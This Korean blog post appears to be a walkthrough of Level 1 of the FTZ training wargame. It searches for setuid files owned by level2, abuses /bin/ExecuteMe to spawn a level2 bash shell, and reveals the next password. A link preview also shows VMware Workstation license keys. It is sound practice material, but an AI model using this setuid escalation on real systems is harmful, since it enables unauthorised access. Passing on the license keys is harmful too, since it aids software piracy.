BLOG

[FTZ] FTZ 시작하기

✅ Program Download 📌 VMware Download VMware Workstation Pro 16 Download 👉🏻 Download VMware Workstation Pro Link VMware Workstation Pro 16 license keys ZF3R0-FHED2-M80TY-8QYGC-NPKYF YF390-0HF8P-..

alltime-it.tistory.com

👤 USER : level1

🔒PASSWORD : level1

📌 현재 경로 확인

[level1@ftz level1]$ pwd

/home/level1

📌 디렉터리 목록 확인

[level1@ftz level1]$ ls -l

total 12
-rw-r--r-- 1 root root 47 Apr 4 2000 hint
drwxr-xr-x 2 root level1 4096 Dec 7 2003 public_html
drwxrwxr-x 2 root level1 4096 Jan 16 2009 tmp

📌 hint 파일 확인

[level1@ftz level1]$ cat hint

level2 권한에 setuid가 걸린 파일을 찾는다.

📌 find 명령어 및 옵션 이용

[level1@ftz level1]$ find / -user level2 -perm -4000 2>/dev/null

/bin/ExecuteMe

🖇️ - perm → setuid 걸려있는 파일 찾기 [setuid 가 걸려있는 파일은 400번대로 표시]

🖇️ 2>/dev/null → 2번은 표준에러를 뜻하며, 표준에러를 null로 리다이렉션

📌 경로이동 및 파일실행

[level1@ftz level1]$ cd /bin/

[level1@ftz bin]$ pwd
/bin

[level1@ftz bin]$ ./ExecuteMe

📌 Shell 획득

레벨 2의 권한으로 당신이 원하는 명령어를 한가지 실행시켜 드리겠습니다.
(단, my-pass 와 chmod는 제외) 어떤 명령을 실행시키겠습니까?

[level2@ftz level2]$ /bin/bash

📌 Level 02 비밀번호 획득

[level2@ftz level2]$ my-pass

Level2 Password is "hacker or cracker".

저작자표시 비영리 변경금지

'Wargame > System' 카테고리의 다른 글

[FTZ] FTZ Level 02 (0)	2022.07.17
[FTZ] FTZ 시작하기 (0)	2022.07.17

😃 Kim Soo Hyun

[FTZ] FTZ Level 01

'Wargame > System' 카테고리의 다른 글

댓글

티스토리툴바

[FTZ] FTZ Level 01

'Wargame > System' 카테고리의 다른 글

관련글

댓글

티스토리툴바